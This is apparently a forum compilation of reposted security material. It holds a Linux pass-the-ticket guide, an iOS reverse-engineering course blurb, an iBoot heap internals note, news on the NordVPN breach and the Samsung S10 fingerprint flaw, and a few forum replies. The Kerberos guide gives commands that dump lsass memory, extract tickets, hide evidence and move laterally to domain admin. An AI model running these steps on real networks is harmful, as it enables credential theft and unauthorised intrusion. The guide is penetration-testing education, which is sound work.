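landed = bytes([0x31, 0xc0, 0x20, 0x50, 0x0d])
print(find_badchars(sent, landed))  # positions 2 and 4 flagged
```

Any byte flagged this way is removed from the payload's allowed character set, and the shellcode is re-encoded without it.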
-
Practical Guide to Passing Kerberos Tickets From Linux

Nov 21, 2019

The goal of this post is to be a practical guide to passing Kerberos tickets from a Linux host. In general, penetration testers are very familiar with using Mimikatz to obtain cleartext passwords or NT hashes and utilize them for lateral movement. At times we may find ourselves in a situation where we have local admin access to a host but are unable to obtain either a cleartext password or an NT hash of a target user. Fear not: in many cases we can simply pass a Kerberos ticket in place of passing a hash. This post is meant to be a practical guide. For a deeper understanding of the technical details and theory, see the resources at the end of the post.

Tools

To get started we will first need to set up some tools. All have setup information on their GitHub pages.

Impacket - https://github.com/SecureAuthCorp/impacket
pypykatz - https://github.com/skelsec/pypykatz
Kerberos client - RPM based: yum install krb5-workstation / Debian based: apt install krb5-user
procdump - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
autoProc.py (not required, but useful) - wget https://gist.githubusercontent.com/knavesec/0bf192d600ee15f214560ad6280df556/raw/36ff756346ebfc7f9721af8c18dff7d2aaf005ce/autoProc.py

Lab Environment

This guide will use a simple Windows lab with two hosts:

dc01.winlab.com (domain controller)
client01.winlab.com (generic server)

And two domain accounts:

Administrator (domain admin)
User1 (local admin to client01)

Passing the Ticket

By some prior means we have compromised the account user1, which has local admin access to client01.winlab.com. A standard technique from this position would be to dump passwords and NT hashes with Mimikatz. Instead, we will use a slightly different technique: dumping the memory of the lsass.exe process with procdump64.exe from Sysinternals. This has the advantage of avoiding antivirus without needing a modified version of Mimikatz.
This can be done by uploading procdump64.exe to the target host: And then run: procdump64.exe -accepteula -ma lsass.exe output-file Alternatively we can use autoProc.py which automates all of this as well as cleans up the evidence (if using this method make sure you have placed procdump64.exe in /opt/procdump/. I also prefer to comment out line 107): python3 autoProc.py domain/user@target We now have the lsass.dmp on our attacking host. Next we dump the Kerberos tickets: pypykatz lsa -k /kerberos/output/dir minidump lsass.dmp And view the available tickets: Ideally, we want a krbtgt ticket. A krbtgt ticket allows us to access any service that the account has privileges to. Otherwise we are limited to the specific service of the TGS ticket. In this case we have a krbtgt ticket for the Administrator account! The next step is to convert the ticket from .kirbi to .ccache so that we can use it on our Linux host: kirbi2ccache input.kirbi output.ccache Now that the ticket file is in the correct format, we specify the location of the .ccache file by setting the KRB5CCNAME environment variable and use klist to verify everything looks correct: export KRB5CCNAME=/path/to/.ccache klist We must specify the target host by the fully qualified domain name. We can either add the host to our /etc/hosts file or point to the DNS server of the Windows environment. Finally, we are ready to use the ticket to gain access to the domain controller: wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn Excellent! We were able to elevate to domain admin by using pass the ticket! Be aware that Kerberos tickets have a set lifetime. Make full use of the ticket before it expires! Conclusion Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. 
As such, passing the ticket is becoming more and more relevant. Resources https://www.tarlogic.com/en/blog/how-kerberos-works/ https://www.harmj0y.net/blog/tag/kerberos/ Thanks to the following for providing tools or knowledge: Impacket gentilkiwi harmj0y SkelSec knavesec Sursa: https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html
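The end-to-end invocation described above can be wrapped in a short helper. A sketch only: the ticket path, DC IP and lab names below are placeholders, while the wmiexec.py flags are the ones used in this post:

```python
import os

def build_wmiexec(domain, user, fqdn, dc_ip, ccache):
    """Point Kerberos at the converted .ccache and build the wmiexec.py
    command line from the post (-no-pass -k forces ticket-based auth)."""
    os.environ["KRB5CCNAME"] = ccache  # same effect as `export KRB5CCNAME=...`
    return ["wmiexec.py", "-no-pass", "-k", "-dc-ip", dc_ip,
            f"{domain}/{user}@{fqdn}"]

# Placeholder lab values; the FQDN must resolve (hosts file or Windows DNS).
cmd = build_wmiexec("winlab.com", "Administrator", "dc01.winlab.com",
                    "192.0.2.10", "/tmp/administrator.ccache")
print(" ".join(cmd))
```

Note that KRB5CCNAME must be set in the environment of the process that runs wmiexec.py, which is why the helper exports it before returning the command line.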
-
Reverse Engineering iOS Applications

Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest in application security and exploitation on iOS. Or maybe you just clicked the wrong link. All the vulnerabilities that I'll show you here are real; they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is that most companies prohibit the publication of such content. We've helped these companies by reporting these issues to them and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course: a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed at teaching you common issues in iOS applications, I felt we needed one that showed the kinds of vulnerabilities we've seen in applications downloaded from the App Store. This course is divided into 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success. This is my first attempt at creating an online course, so bear with me if it's not the best. I love feedback, and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn!
Version: 1.1

Modules

Prerequisites
Introduction
Module 1 - Environment Setup
Module 2 - Decrypting iOS Applications
Module 3 - Static Analysis
Module 4 - Dynamic Analysis and Hacking
Module 5 - Binary Patching
Final Thoughts
Resources

EPUB Download

Thanks to natalia-osa's brilliant idea, there's now a .epub version of the course that you can download from here. As Natalia mentioned, this is for easier consumption of the content. Thanks again for this fantastic idea, Natalia.

License

Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com>

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Donations

I don't really accept donations because I do this to share what I learn with the community. If you want to support me just re-share this content and help reach more people. I also have an online store (nullswag.com) with cool clothing thingies if you want to get something there.

Disclaimer

I created this course on my own and it doesn't reflect the views of my employer; all the comments and opinions are my own.
Disclaimer of Damages

Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers be liable to any user or third party for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk"; I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. This limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages.

Privacy

I'm not personally collecting any information. Since this entire course is hosted on GitHub, that's the privacy policy you want to read.

[^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser: you get to understand the static code (HTML/JavaScript) of the website, but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company that created the application or its end users.

Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
-
iBoot heap internals

This research note provides a basic technical outline of the Apple bootchain's heap internals, key algorithms, and security mitigations. This heap implementation is commonly at work at all stages of the boot procedure of iPhones and other Apple devices, and particularly in SecuROM and iBoot. SecuROM (Apple's 1st stage bootloader) and iBoot (the 2nd stage bootloader) are the two most important targets of jailbreaking efforts, as they form the basic tier of the cryptographic verification foundation on which Apple's entire Secure Boot procedure stands. In general, an understanding of the bootchain's heap internals is essential to exploitation of heap-based memory corruption vulnerabilities in any of the boot loaders. Aside from jailbreaking, Apple's bootchain heap makes a perfect specimen for a generalized study of heap implementations, because it's classical, simple and compact, while still maintaining all the commonly recommended security mitigation techniques. General tendencies of heap placement within the device's address space were discussed in my previous research note: iBoot address space.

Overview

Apple's bootchain uses a classical heap implementation based on free lists, enhanced with immediate coalescing and security mitigations. It is very simple compared to various well-researched kernel and userland heap implementations, such as the Low Fragmentation Heap in Microsoft Windows or Linux's glibc. Each stage of the bootchain receives its own heap. In practice there may be 1-2 heaps backing the runtime memory requirements of the booting code, depending on the platform and the boot stage. The bootchain's heap implementation exposes a standard set of memory management APIs: malloc, calloc, realloc, memalign, free, and memcpy / memset.

Initialization

The heap is initialized in each stage's system initialization routine, immediately after various bootstrapping tasks are completed, such as code and data relocation.
Heap size, the number of heaps and their placement are device-specific, submodel-specific and stage-specific, although some general tendencies may be observed. [1] The initialization routine receives a contiguous piece of physical memory which is designated for the heap, and adds it to the largest bin's free-list. Heap roots - the initial heap handles and bin pointers from which free lists are walked - are maintained in the data section.

Allocations and frees

The bootchain's heap allocator is based on the classical first-fit free-list algorithm with 30 bins and immediate coalescing. New heap chunks requested by malloc() are either allocated contiguously from the slab (represented by some free chunk larger than requested), or re-used from the free-list. Only the free-list based allocator is used; there are no dedicated fast-bins or a large-chunk allocator of the kind commonly found in more advanced heap implementations. On allocation, the free list of the appropriate (by size) bin is iterated, and the first free chunk that accommodates the requested size is assigned to the allocation. Unneeded free space in that chunk is chopped off and returned to the appropriate bin. A freed heap chunk is added at the top of the respective bin. If the adjacent chunk is free, the two chunks are immediately coalesced and moved to the respective bin's free-list.

Free-lists and bins

Free heap chunks are sorted by size and stored into 30 bins, numbered 2 through 31. Each bin is represented by a global variable in the data section that holds the topmost item of the free-list for that bin. A free-list is a simple doubly-linked list. The free-list's previous and next pointers are appended to each heap chunk's metadata header upon a free() operation. Free-lists are walked on each allocation request, starting from the top of the bin appropriate to the requested allocation size.
Heap chunk sizes are measured in, and rounded to, 64-byte units (2^6), including a 64-byte metadata header and reserved space for free-list pointers. For example, the minimum requested allocation size of 1 byte will in practice result in 128 bytes being allocated from the heap. Bins (30 in total, numbered 2 through 31) sort the chunks by powers of 2:

0  => 0-63 bytes (2^6-1) - never happens
1  => 64-127 bytes (2^7-1) - never happens
2  => 128-255 byte chunks
3  => 256-511 byte chunks
4  => 512-1023 byte chunks
... etc., up to 31.

Note: Bins 0 and 1 exist, but they are never used in practice due to allocation size constraints.

Metadata

Each heap chunk has a metadata header prepended, which has a size of 64 bytes both on 32-bit and 64-bit systems. The header contains a 64-bit checksum, followed by a standard set of information fields: the size and busy/free status of the current and the previous chunk. Free chunks have an additional 2*size_t metadata block appended to the header that holds the pointers to the previous and the next free chunk in the bin, used while walking the free-lists.

Security mitigations

The bootchain's heap implementation employs several well-known security mitigations in order to detect random heap corruptions and harden exploit development for heap-based vulnerabilities.

1. The heap uses a 128-bit random cookie which is stored in the data section. The cookie is used for the initial randomization of the heap placement and for verification of heap metadata checksums. On older devices (A7 and earlier) SecuROM and LLB use a statically initialized heap cookie: [ 0x64636b783132322f, 0xa7fa3a2e367917fc ]. Note: the cookie is placed at the top of the data section, as the heap is initialized early. It will not be corrupted by a data-to-heap overflow.

2. Initial heap placement may be randomized with 24 bits of entropy, resulting in a random shift of the heap arena by at most 0x3ffc0 bytes against the data section or wherever else it is placed.
In LLB and SecuROM the shift is not randomized on older devices (up to and including A7).

3. There is no runtime randomization in the allocation algorithm. All heap chunk addresses returned by malloc() are deterministic with respect to the heap base, as they are popped from the appropriate free-list in FIFO manner.

4. Metadata checksum verification. To prevent heap chunk metadata corruption due to a heap overflow, a chunk's checksum is verified on each heap operation, and a corrupted checksum causes an immediate panic. In addition, an extended heap verification occurs prior to executing the next-stage bootloader. The checksum is calculated from the chunk's metadata using the SipHash algorithm, with the heap cookie as a pseudo-random secret key. Because the heap cookie is deterministic in LLB and SecuROM on A7 and earlier SoCs, the checksum is deterministic and heap overflow attacks are trivial in that particular case. On more recent devices, cross-chunk overflow attacks may still be possible, provided that the vulnerability is pivoted to the shellcode before any heap APIs are called. Since heap usage is not very high in the bootchain, this is realistic.

5. Padding verification. Extra bytes of the chunk beyond the user's requested size are padded with a simple rotating pattern, generated by a function of the user's requested size. This mitigation helps to detect casual heap corruptions, but has near-zero impact on exploit development complexity, since the attacker commonly controls the user size of the overflowing chunk.

6. Safe unlinking is in place. Free-list pointers are cross-checked against the previous and the next chunk on each free-list operation. A chunk's size is checked against the previous chunk's next_chunk size.

7. Double-frees are detected by verifying the current chunk's free bit in the metadata header.

8. Freed chunks are zeroed.
Thus a typical use-after-free vulnerability will manifest itself as a null-pointer dereference, i.e. a clean crash. This has no impact on exploit development.

9. All new allocations are zero-initialized. This closes much of the opportunity for memory disclosure attacks via an uninitialized heap variable vulnerability.

10. Zero-sized allocations are not permitted, and will result in a panic.

11. Negatively sized allocations due to an integer underflow/overflow are possible. They are less likely on 64-bit devices, since malloc's size argument would be 64-bit in that case.

In summary, these mitigations ensure a basic level of heap protection on recent devices. Exploitation of typical heap corruption vulnerabilities such as data-to-heap and cross-chunk overflows is still possible and realistic in many cases. The strongest mitigations in place are checksum verification and safe unlinking, which make exploitation of cross-chunk overflows on recent devices non-trivial. This is especially relevant to iBoot, which uses the heap more actively than SecuROM, making it more likely that corrupted heap metadata will be detected before the shellcode has had a chance to execute.

References

1. "iBoot address space", Alisa Esage - http://re.alisa.sh/notes/iBoot-address-space.html
2. iOS Security Guide - https://www.apple.com/business/docs/site/iOS_Security_Guide.pdf
3. Memory Management Reference - https://www.memorymanagement.org/index.html

Annex A

This research note is a teaser into advanced stages of iBootcamp, an online training course on iOS internals and vulnerability research for beginners that I am creating. The only live session of Stage 0 will take place on 12-21 December 2019. You are welcome. ⭐️

Created and published by Alisa Esage Шевченко on 23 November 2019. Last edited: 23 November 2019. Original URL: http://re.alisa.sh/notes/iBoot-heap-internals.html. Author's contacts: e-mail, twitter, github.

Sursa: https://re.alisa.sh/notes/iBoot-heap-internals.html
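The chunk sizing and binning rules described under "Free-lists and bins" can be modeled in a few lines of Python. This is my own model of the written description, not Apple's code:

```python
# Model of the sizing rules described in the note; my reading of the
# description, not Apple's actual implementation.

UNIT = 64  # allocation granularity, also the metadata header size

def chunk_size(requested: int) -> int:
    """Total chunk size for malloc(requested): 64-byte header plus data,
    rounded up to the next 64-byte unit (so malloc(1) consumes 128 bytes)."""
    assert requested > 0, "zero-sized allocations panic"
    return -(-(UNIT + requested) // UNIT) * UNIT

def bin_index(size: int) -> int:
    """Bin holding a free chunk of this total size: bins sort by powers of
    two, bin 2 covering 128-255 bytes, bin 3 covering 256-511, and so on."""
    return size.bit_length() - 6

print(chunk_size(1), bin_index(chunk_size(1)))  # 128 2
```

The model also shows why bins 0 and 1 are never used: the smallest possible chunk (header plus one data unit) is already 128 bytes, which lands in bin 2.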
-
Hi, even if it fetches them from a host, someone can see where it fetches them from and fetch them themselves. There is no way for an application to connect directly to a database such that a malicious person cannot do the same thing. For this kind of need you can build a web application, an API, which the C# application contacts and which exposes the database operations. Preferably behind authentication (e.g. a user logs in and then performs various actions there).
-
decrypt ransomware coot
Nytro replied to LucasTony's topic in Reverse engineering & exploit development
Anyone who strays from the subject, posts insults, or goes off-topic gets banned on the spot.
Find a book, either buy it or download it as a PDF (you can find pretty much anything you want), and read it. Practice while you read. I think that's the simplest and most effective approach. As for other documentation, there's php.net, where you'll find pretty much everything you need, plus a ton of tutorials on any topic. Including the security side, where you need to be careful.
-
If you don't have a ticket yet, get one today, because it looks like prices go up starting tomorrow.
-
Just forge some badges, how hard can it be?
-
As a hint, there's a "://" in that message, so it's probably a URL. Then there are those numbers, which things can be done with.
-
Hi, can someone help me with two problems
Nytro replied to lux0ver's topic in Discutii incepatori
Using the Azure API you create a Windows 10 virtual machine. You can build one that contains whatever you want installed and clone it whenever you create a new one. You generate a random password and allow the RDP port in the Network Security Group on the created resource (the VM). Then users connect over RDP and do whatever they want there. There are plenty of discussions about creating VMs on Stack Overflow.
Hi, can someone help me with two problems
Nytro replied to lux0ver's topic in Discutii incepatori
It depends on what you mean by remote control. First of all, what operating system will the virtual machines run, Linux? Then, what do you want to allow users to do through that remote control?
Hi, can someone help me with two problems
Nytro replied to lux0ver's topic in Discutii incepatori
If you use virtual machines in Azure, you can use the Azure API to create them, and it's not difficult. I don't know how it works out cost-wise, though. https://docs.microsoft.com/en-us/azure/virtual-machines/linux/create-vm-rest-api
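From the linked documentation, creating a VM boils down to a PUT against the Azure Resource Manager endpoint. Below is a sketch of the URL construction plus the random-password generation mentioned earlier in the thread; the subscription ID, resource group, VM name and api-version values are placeholder assumptions:

```python
import secrets
import string

ARM = "https://management.azure.com"

def vm_url(subscription, resource_group, vm_name, api_version="2019-03-01"):
    """PUT target for creating a Microsoft.Compute/virtualMachines resource.
    The api-version shown here is a placeholder and may have changed."""
    return (f"{ARM}/subscriptions/{subscription}"
            f"/resourceGroups/{resource_group}"
            f"/providers/Microsoft.Compute/virtualMachines/{vm_name}"
            f"?api-version={api_version}")

def random_password(length=16):
    """Random admin password for the freshly created VM."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(vm_url("SUB-ID", "my-rg", "vm01"))
print(random_password())
```

The request itself needs an OAuth bearer token and a JSON body describing the VM (size, image, OS profile with the generated password), as shown in the Microsoft docs.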
International Hacking & Information Security Conference
7th-8th NOV 2019
BUY TICKETS
Bucharest, Romania

About DefCamp

DefCamp is the most important annual conference on Hacking & Information Security in Central Eastern Europe. Every year it brings together the world's leading cyber security doers to share their latest research and knowledge. Over 2,000 decision makers, security specialists, entrepreneurs, developers, and people from the academic, private and public sectors meet under the same roof in Bucharest, Romania every fall, in November. Worldwide recognized speakers showcase the naked truth about sensitive topics like infrastructure (in)security, GDPR, cyber warfare, ransomware, malware, social engineering, offensive & defensive security measures, etc. Yet the most active part of the conference is the Hacking Village, the specially designed playground for all hacking activities happening at DefCamp.

Site: https://def.camp/
-
Hi, can someone help me with two problems
Nytro replied to lux0ver's topic in Discutii incepatori
Hi, if you only want it for testing and not something professional (e.g. something you charge money for), the SIMPLEST solution might be to create a Docker container. It's just not quite a virtual machine. If you want to hand out VPSes, it gets more complicated.
NordVPN, a virtual private network provider that promises to “protect your privacy online,” has confirmed it was hacked. The admission comes following rumors that the company had been breached. It first emerged that NordVPN had an expired internal private key exposed, potentially allowing anyone to spin out their own servers imitating NordVPN. VPN providers are increasingly popular as they ostensibly provide privacy from your internet provider, and from the sites you visit, regarding your internet browsing traffic. That’s why journalists and activists often use these services, particularly when they’re working in hostile states. These providers channel all of your internet traffic through one encrypted pipe, making it more difficult for anyone on the internet to see which sites you are visiting or which apps you are using. But often that means displacing your browsing history from your internet provider to your VPN provider. That’s left many providers open to scrutiny, as often it’s not clear whether each provider is logging every site a user visits. For its part, NordVPN has claimed a “zero logs” policy. “We don’t track, collect, or share your private data,” the company says. But the breach is likely to cause alarm that hackers may have been in a position to access some user data. NordVPN told TechCrunch that one of its data centers was accessed in March 2018. “One of the data centers in Finland we are renting our servers from was accessed with no authorization,” said NordVPN spokesperson Laura Tyrell. The attacker gained access to the server — which had been active for about a month — by exploiting an insecure remote management system left by the data center provider; NordVPN said it was unaware that such a system existed. NordVPN did not name the data center provider.
“The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either,” said the spokesperson. “On the same note, the only possible way to abuse the website traffic was by performing a personalized and complicated man-in-the-middle attack to intercept a single connection that tried to access NordVPN.” According to the spokesperson, the expired private key could not have been used to decrypt the VPN traffic on any other server. NordVPN said it found out about the breach a “few months ago,” but the spokesperson said the breach was not disclosed until today because the company wanted to be “100% sure that each component within our infrastructure is secure.” A senior security researcher we spoke to who reviewed the statement and other evidence of the breach, but asked not to be named as they work for a company that requires authorization to speak to the press, called these findings “troubling.” “While this is unconfirmed and we await further forensic evidence, this is an indication of a full remote compromise of this provider’s systems,” the security researcher said. “That should be deeply concerning to anyone who uses or promotes these particular services.” NordVPN said “no other server on our network has been affected.” But the security researcher warned that NordVPN was ignoring the larger issue of the attacker’s possible access across the network. “Your car was just stolen and taken on a joy ride and you’re quibbling about which buttons were pushed on the radio?” the researcher said. The company confirmed it had installed intrusion detection systems, a popular technology that companies use to detect early breaches, but “no-one could know about an undisclosed remote management system left by the [data center] provider,” said the spokesperson. 
“They spent millions on ads, but apparently nothing on effective defensive security,” the researcher said. NordVPN was recently recommended by TechRadar and PCMag. CNET described it as its “favorite” VPN provider. It’s also believed several other VPN providers may have been breached around the same time. Similar records posted online — and seen by TechCrunch — suggest that TorGuard and VikingVPN may have also been compromised. A spokesperson for TorGuard told TechCrunch that a “single server” was compromised in 2017 but denied that any VPN traffic was accessed. TorGuard also put out an extensive statement following a May blog post, which first revealed the breach. Updated with comment from TorGuard. Sursa: https://techcrunch.com/2019/10/21/nordvpn-confirms-it-was-hacked/
-
Samsung: Anyone's thumbprint can unlock Galaxy S10 phone

[Image caption: A graphic symbol tells users where they need to press to provide a fingerprint]

A flaw that means any fingerprint can unlock a Galaxy S10 phone has been acknowledged by Samsung. It promised a software patch that would fix the problem. The issue was spotted by a British woman whose husband was able to unlock her phone with his thumbprint just by adding a cheap screen protector. When the S10 was launched, in March, Samsung described the fingerprint authentication system as "revolutionary".

Air gap

The scanner sends ultrasounds to detect the 3D ridges of fingerprints in order to recognise users. Samsung said it was "aware of the case of S10's malfunctioning fingerprint recognition and will soon issue a software patch". South Korea's online-only KaKao Bank told customers to switch off the fingerprint-recognition option to log in to its services until the issue was fixed. Previous reports suggested some screen protectors were incompatible with Samsung's reader because they left a small air gap that interfered with the scanning.

Thumb print

The British couple who discovered the security issue told the Sun newspaper it was a "real concern". After buying a £2.70 gel screen protector on eBay, Lisa Neilson registered her right thumbprint and then found her left thumbprint, which was not registered, could also unlock the phone. She then asked her husband to try, and both his thumbs also unlocked it. And when the screen protector was added to another relative's phone, the same thing happened.

Sursa: https://www.bbc.com/news/technology-50080586
-
If you learn C++, it will be easy for you to learn any other language later on.
-
When it comes to discussions like this, people eager to "discuss" always show up.
-
The button in the menu (next to Downloads) is tied to this application.